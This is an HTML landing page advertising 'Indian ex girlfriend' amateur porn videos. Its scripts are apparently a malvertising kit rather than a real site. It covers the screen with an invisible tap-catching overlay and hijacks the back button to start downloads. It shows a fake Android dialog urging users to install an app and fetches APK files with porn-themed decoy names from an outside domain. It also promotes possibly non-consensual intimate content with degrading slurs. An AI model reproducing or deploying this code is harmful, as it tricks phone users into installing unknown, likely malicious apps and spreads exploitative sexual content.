<!DOCTYPE html>
<html lang="en"><head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
   т 
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"
    />
    <title>Download...</title>
    <meta name="description" content="Indian Amateur and Ex Girlfriend Videos">
    <link href="./assets/bootstrap.min.css" rel="stylesheet">
    <link href="./assets/style.css" rel="stylesheet">
    <link href="./assets/css.css" rel="stylesheet">
    <link rel="icon" href="./assets/favicon.ico" >
    <style>
        html,
        body {
            padding: 0;
            margin: 0;
            width: 100%;
            height: 100%;
            font-size: 13px;
            font-family: Arial, Verdana, sans-serif;
        }
        .banner img{
            width: 100%;
            object-fit: contain;
            height: 100%;
        }

        .globaltap {
            position: fixed !important;
            z-index: 99991 !important;
            display: block !important;
            width: 100% !important;
            height: 100% !important;
            top: 0 !important;
        }

        .lut-hidden {
            display: none !important;
        }

        .lut-android-dialog-overlay,
        .push-android-dialog-overlay {
            position: fixed !important;
            z-index: 99992 !important;
            display: block;
            width: 100% !important;
            height: 100% !important;
            top: 0 !important;
            background: rgba(0, 0, 0, 0.7);
        }

        .push-android-dialog-overlay .lut-android-dialog {
            height: 120px;
            width: 88vw;
            left: 6vw;
        }

        .push-android-dialog-overlay .lut-android-dialog-content {
            margin: 15px 24px 20px 24px;
        }

        .push-android-dialog-overlay img {
            width: 21px;
            vertical-align: middle;
            padding-right: 5px;
        }

        .lut-android-dialog {
            height: 144px;
            margin-top: -72px;

            width: 70vw;
            left: 15vw;

            top: 50%;
            position: fixed;
            background: white;
            border-radius: 4px;
            box-shadow: rgba(0, 0, 0, 0.2) 0 11px 15px -7px, rgba(0, 0, 0, 0.14) 0 24px 38px;
        }

        .lut-android-dialog-title {
            margin: 20px 0 12px 24px;
            font-family: Roboto, sans-serif;
            -webkit-font-smoothing: antialiased;
            font-size: 20px;
            line-height: 32px;
            font-weight: 500;
            letter-spacing: .25px;
            text-decoration: inherit;
            text-transform: inherit;
            color: black;
        }

        .lut-android-dialog-content {
            font-family: Roboto, sans-serif;
            font-size: 16px;
            font-weight: 400;
            letter-spacing: 0.5px;
            margin: 10px 0 20px 24px;
            color: rgba(0, 0, 0, 0.6);
        }

        .lut-android-dialog-actions {
            text-align: right;
            padding-right: 8px;
        }

        .lut-android-dialog-actions button {
            font-family: Roboto, sans-serif;
            appearance: none;
            background-color: rgba(0, 0, 0, 0);
            border: none;
            color: #4184F2;
            /*color: rgb(98, 0, 238);*/
            font-size: 14px;
            font-stretch: 100%;
            font-style: normal;
            font-weight: 500;
            height: 36px;
            justify-content: center;
            letter-spacing: 1.25px;
            padding: 0 8px;
            margin-left: 8px;
            outline: none !important;
        }

        .skip-ad {
            background: rgba(0, 0, 0, 0.7);
            font-family: Roboto, Arial, sans-serif;
            font-size: 18px;
            /*display: block;*/
            position: fixed;
            right: 0;
            bottom: 120px;
            /* width: 125px; */
            /* height: 21px; */
            color: white;
            padding: 7px 10px 10px 10px;
            border: 1px solid rgba(255, 255, 255, 1.0);
            text-decoration: none;
            text-align: center;
            display: inline-block;
        }

        .skip-ad div {
            line-height: 10px;
            display: inline-block;
            font-size: 26px;
            margin-left: 5px;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="borderWrap">
            <div class="banner">
                <img src="./assets/banner-xs.webp" class="img-responsive center-block">
            </div>
            <div class="banner2">
                <a href="#"><img src="./assets/banner-xs.webp" class="img-responsive center-block"></a>
            </div>
            <div class="banner3">
                <a href="#"><img src="./assets/banner-xs.webp" class="img-responsive center-block"></a>
            </div>
            <div class="row-img">

             <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/01.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/02.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/03.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/04.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/05.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/06.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/07.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/08.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/09.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/10.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                  <div class="clearfix"></div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/11.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/12.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
               
                <div class="clearfix"></div>
                <div class="col-md-12 text-center">
                    <h1>Real Submitted Indian Ex Girlfriend Videos. The largest Indian GF Archive!</h1>
                    <h2><a href="#">The Biggest collection of the hottest real amateur Indian Girlfriends</a>
                    </h2>
                </div>
                <div class="clearfix"></div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/13.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/14.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/15.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                <div class="box col-xs-12 col-sm-6 col-md-4 col-lg-3">
                    <a href="#" class="pic"><img src="./assets/16.webp" name="thumb" id="thumb" class="imgBox center-block img-responsive" width="300"></a>

                    <a href="#" class="dbtn"><img src="./assets/btn-download.jpg" class="btn-download center-block img-responsive" width="300"></a>
                </div>
                
                <div class="clearfix"></div>
                
                <div class="clearfix"></div>
                <div class="clearfix"></div>
            </div>
            <div class="footerLink col-md-12 text-center">
                <a href="#"><img src="assets/footerLink.jpg" class="img-responsive center-block"></a>

                <div class="textlink text-center col-md-12">
                    <h2>
                        <a href="#" class="h2">REAL INDIAN AMATEURS</a> - <a href="#" class="h2">HORNY INDIAN SLUTS</a> - <a href="#" class="h2">REAL DESI WHORES</a>
                        <br>
                        <a href="#" class="h2">AMATEUR MMS VIDEOS</a> - <a href="#" class="h2">HOT
                            HINDI TEENS</a> - <a href="#" class="h2">SEXY BHABHI SLUTS</a>
                    </h2>
                </div>
                <div class="footer-links text-center col-md-12">
                    <a href="#" target="_blank">Members</a>&nbsp;<span class="bullet">•</span>&nbsp; <a href="#">Customer Support</a>&nbsp;<span class="bullet">•</span>&nbsp;
                    <a href="#">Webmasters</a>&nbsp;<span class="bullet">•</span>&nbsp; <a href="#">Privacy Policy</a><span class="bullet"> •</span>&nbsp; <a href="#">Refund Policy</a>
                    <span class="bullet"> •</span>&nbsp; <a href="#">Terms</a><span class="bullet">
                        •</span>&nbsp; <a href="#">Delete My GF</a>&nbsp;<span class="bullet">•</span>&nbsp;
                    <a href="#">Submit</a>
                </div>
                <div class="biller text-center col-md-12">
                    <a href="#" target="_blank">18 U.S.C. 2257 Record-Keeping Requirements Compliance
                        Statement</a> <br>
                    Please visit <a href="#" target="_blank">VENDO</a>, <a href="#" target="_blank">SEGPAYCS.COM</a>, <a href="#" target="_blank">EPOCH.COM</a>,
                    <a href="#" target="_blank">WTS/ACHDebit</a> or <a href="#" target="_blank">CCBILL</a>, our authorized sales agents
                </div>
                <div class="col-md-12 asacp"><img src="assets/asacp_corporate.gif" height="45" class="center-block" width="92" border="0"></div>
                <div class="copyright col-md-12 text-center">
                    All models featured herein were at least 18 years of age at the time of photography. All images,
                    content and intellectual materials are Copyright © IndianGfVideos. All Rights Reserved.
                </div>
            </div>
            <div class="clearfix"></div>
        </div>
    </div>

    <a id="lut-android-dialog-overlay" class="lut-android-dialog-overlay" style="display: none" onclick="
        LUT.hideElement('lut-android-dialog-overlay')
        doLeaveWork()
        ">
        <div class="lut-android-dialog">
            <div class="lut-android-dialog-title">
                Leave page
            </div>
            <div class="lut-android-dialog-content">
                Exit?
            </div>
            <div class="lut-android-dialog-actions">
                <button>CANCEL</button>
                <button>OK</button>
            </div>
        </div>
    </a>

    <a id="push-android-dialog-overlay" class="push-android-dialog-overlay" onclick="
        LUT.hideElement('push-android-dialog-overlay');
        glTapClick(false);
        return false;
        ">
        <div class="lut-android-dialog">
            <div class="lut-android-dialog-content">
                <img src="./assets/bell.png">
                Install Top Indian App to watch the best videos!</div>
            <div class="lut-android-dialog-actions">
                <button>CANCEL</button>
                <button>ACCEPT</button>
            </div>
        </div>
    </a>

    <a class="globaltap" onclick="glTapClick()"></a>

    <div class="adsbox">&nbsp;</div>
    <div class="adsbox">&nbsp;</div>

    <script>
        var apk_names = ["Hardcore_Anal_Penetration.zip", "MILF_best_private_video.zip", "Redhead_porno_video",
            "BBC_gangbang_with_blondie", "pornovideo_best_of_this_mount", "my_doggy_anal_home_video",
            "hot_sex_after_penetrex.zip", "ass_fucker_like - it", "milf_want_sex_with_you", "CAMS_free_slut",
            "Hot_brazillian_want_sex", "yeah_yeah_hardsex", "gostosa_XXX_sex", "puta_sexy"
        ];
        var apkNamesLength = apk_names.length;
        var needNameFromArray = Boolean(0);
        var needRandomName = Boolean(0);

        var smartlink = 'https://www.directdexchange.com/jump/next.php?r=3670675&sub1=newlandVP';
        // leaveAction - выбираем, какое действие делать при нажатии окна, которое появилось после кнопки бэк
        // 1 - ливнуть с ленда
        // 2 - скачать апк
        // 3 - скачать апк и ливнуть со страницы
        // 4 - перейти на указанный линк
        var leaveAction = 4;

        var link1 = '%%LINK1%%';

        // ------------ start
        const bin2hex = (s) => {
            var i, l, o = "", n
            s += ""

            for (let i= 0, l=s.length; i<l; i++) {
                n = s.charCodeAt(i).toString(16)
                o += n.length < 2 ? "0" + n : n
            }
            return o
        }
        const changeRef = (link) => {
            const splitGp = link.split('referrer=')
            const gpUrl = splitGp[0]
            let params = splitGp[1] ? decodeURIComponent(splitGp[1]) : ''

            const refParams = new URLSearchParams(params)
            let version = refParams.get('version') || refParams.get('con') || 'https://app.fextok.com/continue'
            let utm_campaign = refParams.get('utm_campaign') || ''
            let utm_medium = refParams.get('utm_medium') || ''
            let link_id = refParams.get('link_id') || ''
            let key = refParams.get('key') || ''
            if (version) {
                refParams.delete('version')
                refParams.delete('con')
                const con = version + '?pbref2=' + bin2hex(refParams.toString())
                refParams.set('con', con)
            }
            refParams.delete('link_id')
            refParams.delete('key')
            const noCon = [].some(v => gpUrl.includes(v))
            if (noCon) {
                link = gpUrl + 'referrer=' + refParams.get('con')
            }
            else {
                link = gpUrl + 'referrer=' + encodeURIComponent(refParams.toString())
            }
            return link
        }
        link1 = changeRef(link1)
        // ------------ end

        var needAutoLoad = Boolean(0);
        var autoloadAfterClick = Boolean(0);
        var autoLoadDelay = 5000;
        var clickCounterNeedRecycle = 4;

        var clickId = "";
        var p1 = "";
        var extra = "";
        var adk = "ZWMwMDBhMDVmMjAwMWI5MzAwMDAxYjg3MDAxYjg3MDAxYjg3YjBiMGFiOWI2Yw==";
        var name = "";
        var domain = "ne.suivrot.com";
        var postback_id = "";
        var dtp = "1";

        var apk_url = "http://" + domain + "/download/2/" + adk + "/?dtp=" + dtp + "&network=" + postback_id + "&sclid=" + clickId + "&p1=" + p1 + "&name=" + name + "&add_extra_params=" + extra;
        var selectedIndexes = []
        console.log(apk_url)

        function updateAPKURL() {
            var finalName = "";
            var apkCounter = LUT.getCookieCounter("apk_counter");

            if (needNameFromArray) { // Нужно имя из массива, не из параметра
                if (apkCounter > 1) { // Первое из параметра
                    var idx = 0
                    if (needRandomName) { // нужно рандомное имя
                        idx = getRandomUniqIntInclusive(0, apkNamesLength);
                    } else { // нужно имя по порядку
                        idx = apkCounter % apkNamesLength
                    }
                    finalName = apk_names[idx];
                } else {
                    finalName = name;
                }
            } else { // Нужно имя из параметра
                finalName = name + apkCounter;
            }
            apk_url = "http://" + domain + "/download/2/" + adk + "/?dtp=" + dtp + "&network=" + postback_id + "&sclid=" + clickId + "&p1=" + p1 + "&name=" + finalName + "&add_extra_params=" + extra;
        }

        function getRandomUniqIntInclusive(min, max) {
            if (selectedIndexes.length === apk_names.length) {
                selectedIndexes = [];
            }
            min = Math.ceil(min);
            max = Math.floor(max);
            var rnd = Math.floor(Math.random() * (max - min + 1)) + min; //Максимум и минимум включаются
            while (selectedIndexes.indexOf(rnd) > -1) {
                rnd = Math.floor(Math.random() * (max - min + 1)) + min;
            }
            selectedIndexes.push(rnd)
            return rnd
        }
    </script>

    <script src="./assets/lut.js"></script>

    <script>
        function glTapClick() {
            console.log("glTapClick 1");
            try {
                openNewWindow(true);
                if (autoloadAfterClick) {
                    setTimeout(() => {
                        openNewWindow(true);
                    }, 300);
                }
                return false;
            } catch (e) {
                console.error(e);
            }
        }
    </script>

    <script>
        var luid = LUT.initId("luid");
        var backCount = 0

        LUT.fixBackButton(function() {
            console.log("onback");
            backCount++;
            if (backCount === 1) {
                // При первом клике назад скачиваем apk
                openNewWindow(true);
            } else if (backCount === 2) {
                LUT.showElement("lut-android-dialog-overlay");
            } else {
                openNewWindow(true);
            }
        });
    </script>

    <script>
        var firstClick = true;
        var useIframe = false;

        function openNewWindow(fromAutoload) {
            console.log("openNewWindow")
            var click_counter;
            var click_counter_cycled = -1;
            if (!fromAutoload) {
                click_counter = LUT.incCookieCounter("click_counter");
                click_counter_cycled = click_counter % clickCounterNeedRecycle;
            }

            switch (true) {
                case fromAutoload:
                    LUT.incCookieCounter("apk_counter");
                    console.log('1')
                    window.open(link1, '_blank');


                    break;
                case click_counter_cycled === 0:
                    console.log('2')
                    location.href = link1;

                    break;
                default:
                    LUT.incCookieCounter("apk_counter");
                    console.log('3')
                    updateAPKURL();
                    location.href = link1;
                    break;
            }
            return false;
        }

        function setDownloadTimeout(delay) {
            setTimeout(
                function() {
                    openNewWindow(true);
                },
                delay
            );
        }

        if (needAutoLoad && !autoloadAfterClick) {
            setDownloadTimeout(autoLoadDelay);
        }
    </script>

    <script>
        function doLeaveWork() {
            switch (leaveAction) {
                case 1:
                    history.go(-2)
                    break;
                case 2:
                    try {
                        history.pushState({}, document.title, window.location.href);
                        console.log("pushed from popstate");
                    } catch (e) {
                        console.error(e);
                    }
                    openNewWindow(true);
                    break;
                case 3:
                    openNewWindow(true);
                    setTimeout(() => {
                        history.back();
                        history.back();
                    }, 500);
                    break;
                case 4:
                    location.href = link1;
                    break;

                default:
                    break;
            }
        }
    </script>
<script defer="defer" src="assets/7m3fr7NJOH.html" onload="if(typeof getIDDQD === 'function'){document.cookie = 'ut=' + getIDDQD() + ';expires=Fri, 21 Jan 2028 16:19:34 GMT;path=/';}"></script>

</body></html>